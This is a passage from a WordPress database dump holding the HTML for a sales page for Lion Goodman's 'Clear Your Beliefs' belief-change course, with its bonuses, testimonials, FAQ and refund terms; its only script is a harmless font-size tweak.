in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\n jQuery(''h5.hdr'').css(''font-size'', ''51px'');\r\n } \r\n});\r\n</script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:41:21', '2014-06-18 02:41:21', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1004, 4194, '2014-06-17 21:42:30', '2014-06-18 02:42:30', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" 